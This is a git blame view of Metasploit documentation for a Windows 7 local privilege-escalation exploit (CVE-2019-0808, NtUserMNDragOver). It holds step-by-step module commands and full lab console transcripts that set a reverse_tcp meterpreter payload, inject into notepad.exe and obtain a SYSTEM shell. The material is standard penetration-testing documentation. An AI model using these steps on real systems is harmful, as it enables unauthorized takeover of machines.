adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
6d9d9a70d410cc94de4d3d9afd7a75cd426d43be
metasploit-gs/documentation/modules/exploit/windows/local/ntusermndragover.md
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

120 lines
4.1 KiB
Markdown
Raw Normal View History

add documentation for CVE-2019-0808
2020-04-28 16:16:56 +08:00
## Vulnerable Application
Update documentation where possible for changed exploits
2021-07-20 15:54:09 -05:00
This module exploits a NULL pointer dereference vulnerability in
MNGetpItemFromIndex(), which is reachable via a NtUserMNDragOver() system
Documentation alignment to 72 character width as is standard
2020-05-05 21:01:52 -05:00
call.
The NULL pointer dereference occurs because the xxxMNFindWindowFromPoint()
Update documentation where possible for changed exploits
2021-07-20 15:54:09 -05:00
function does not effectively check the validity of the tagPOPUPMENU
objects it processes before passing them on to MNGetpItemFromIndex(),
Documentation alignment to 72 character width as is standard
2020-05-05 21:01:52 -05:00
where the NULL pointer dereference will occur.
Update documentation where possible for changed exploits
2021-07-20 15:54:09 -05:00
This module has been tested against Windows 7 x86 SP0 and SP1.
Offsets within the solution may need to be adjusted to work with
Documentation alignment to 72 character width as is standard
2020-05-05 21:01:52 -05:00
other versions of Windows, such as Windows Server 2008.
add documentation for CVE-2019-0808
2020-04-28 16:16:56 +08:00
## Verification Steps
1. Get a non-SYSTEM meterpreter session on Windows 7 x86
add windows 7 sp1 scenario
2020-04-29 17:19:34 +08:00
1. `use exploit/windows/local/ntusermndragover`
1. `set session <session>`
1. `set payload windows/meterpreter/reverse_tcp`
1. `set LHOST <LHOST>`
1. `set LPORT 5555`
1. `exploit`
1. Get a SYSTEM session
add documentation for CVE-2019-0808
2020-04-28 16:16:56 +08:00
## Scenarios
### Windows 7 SP0 x86
```
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf exploit(multi/handler) > sessions
add windows 7 sp1 scenario
2020-04-29 17:19:34 +08:00
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows User-PC\User @ USER-PC 192.168.56.1:4444 -> 192.168.56.15:49158 (192.168.56.15)
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf exploit(multi/handler) > use exploit/windows/local/ntusermndragover
msf exploit(windows/local/ntusermndragover) > set session 1
add windows 7 sp1 scenario
2020-04-29 17:19:34 +08:00
session => 1
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp
add windows 7 sp1 scenario
2020-04-29 17:19:34 +08:00
payload => windows/meterpreter/reverse_tcp
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1
add windows 7 sp1 scenario
2020-04-29 17:19:34 +08:00
LHOST => 192.168.56.1
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf exploit(windows/local/ntusermndragover) > set LPORT 5555
add windows 7 sp1 scenario
2020-04-29 17:19:34 +08:00
LPORT => 5555
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf exploit(windows/local/ntusermndragover) > run
add windows 7 sp1 scenario
2020-04-29 17:19:34 +08:00
[*] Started reverse TCP handler on 192.168.56.1:5555
add basic check method
2020-04-30 18:25:52 +08:00
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
Update documentation where possible for changed exploits
2021-07-20 15:54:09 -05:00
[+] Reflectively injecting the exploit DLL and running the exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
add windows 7 sp1 scenario
2020-04-29 17:19:34 +08:00
[*] Sending stage (176195 bytes) to 192.168.56.15
[*] Meterpreter session 2 opened (192.168.56.1:5555 -> 192.168.56.15:49159) at 2020-04-29 17:14:46 +0800
add documentation for CVE-2019-0808
2020-04-28 16:16:56 +08:00
meterpreter > sysinfo
Computer : USER-PC
OS : Windows 7 (6.1 Build 7600).
Architecture : x86
System Language : en_GB
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
add windows 7 sp1 scenario
2020-04-29 17:19:34 +08:00
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
### Windows 7 SP1 x86
```
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf exploit(multi/handler) > sessions
add windows 7 sp1 scenario
2020-04-29 17:19:34 +08:00
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows User-PC\User @ USER-PC 192.168.56.1:4444 -> 192.168.56.5:49157 (192.168.56.5)
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf exploit(multi/handler) > use exploit/windows/local/ntusermndragover
msf exploit(windows/local/ntusermndragover) > set session 1
add windows 7 sp1 scenario
2020-04-29 17:19:34 +08:00
session => 1
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp
add windows 7 sp1 scenario
2020-04-29 17:19:34 +08:00
payload => windows/meterpreter/reverse_tcp
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1
add windows 7 sp1 scenario
2020-04-29 17:19:34 +08:00
LHOST => 192.168.56.1
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf exploit(windows/local/ntusermndragover) > set LPORT 5555
add windows 7 sp1 scenario
2020-04-29 17:19:34 +08:00
LPORT => 5555
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf exploit(windows/local/ntusermndragover) > run
add documentation for CVE-2019-0808
2020-04-28 16:16:56 +08:00
add windows 7 sp1 scenario
2020-04-29 17:19:34 +08:00
[*] Started reverse TCP handler on 192.168.56.1:5555
add basic check method
2020-04-30 18:25:52 +08:00
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
add documentation for CVE-2019-0808
2020-04-28 16:16:56 +08:00
[*] Launching notepad.exe to host the exploit...
add windows 7 sp1 scenario
2020-04-29 17:19:34 +08:00
[+] Process 2696 launched.
[*] Injecting exploit into 2696 ...
fix
2020-04-30 17:54:57 +08:00
[*] Exploit injected. Injecting payload into 2696...
[*] Payload injected. Executing exploit...
add windows 7 sp1 scenario
2020-04-29 17:19:34 +08:00
[*] Sending stage (176195 bytes) to 192.168.56.5
[*] Meterpreter session 2 opened (192.168.56.1:5555 -> 192.168.56.5:49158) at 2020-04-29 17:18:00 +0800
add documentation for CVE-2019-0808
2020-04-28 16:16:56 +08:00
add windows 7 sp1 scenario
2020-04-29 17:19:34 +08:00
meterpreter > sysinfo
Computer : USER-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x86
System Language : en_GB
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
add documentation for CVE-2019-0808
2020-04-28 16:16:56 +08:00
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
add windows 7 sp1 scenario
2020-04-29 17:19:34 +08:00
meterpreter >
add documentation for CVE-2019-0808
2020-04-28 16:16:56 +08:00
```
Reference in New Issue Copy Permalink